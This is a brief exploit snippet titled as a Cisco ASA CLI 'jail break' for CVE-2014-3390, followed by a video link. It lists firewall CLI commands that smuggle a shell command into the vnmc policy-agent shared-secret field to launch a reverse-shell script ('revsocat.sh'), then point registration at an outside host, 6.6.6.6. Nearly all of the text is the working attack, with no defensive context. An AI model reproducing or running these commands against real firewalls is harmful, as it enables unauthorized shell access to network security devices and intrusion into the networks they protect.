Cisco ASA firewall: Cisco CLI “jail break” (CVE-2014-3390)

Shell access without a reboot

ciscoasa (config) # vnmc policy-agent
ciscoasa (config-vnmc-policy-agent) # shared-secret &/mnt/disk0/revsocat.sh&
ciscoasa (config-vnmc-policy-agent) # registration hot 6.6.6.6

https://www.youtube.com/watch?v=KXqrovapQ5A&feature=youtu.be&t=1495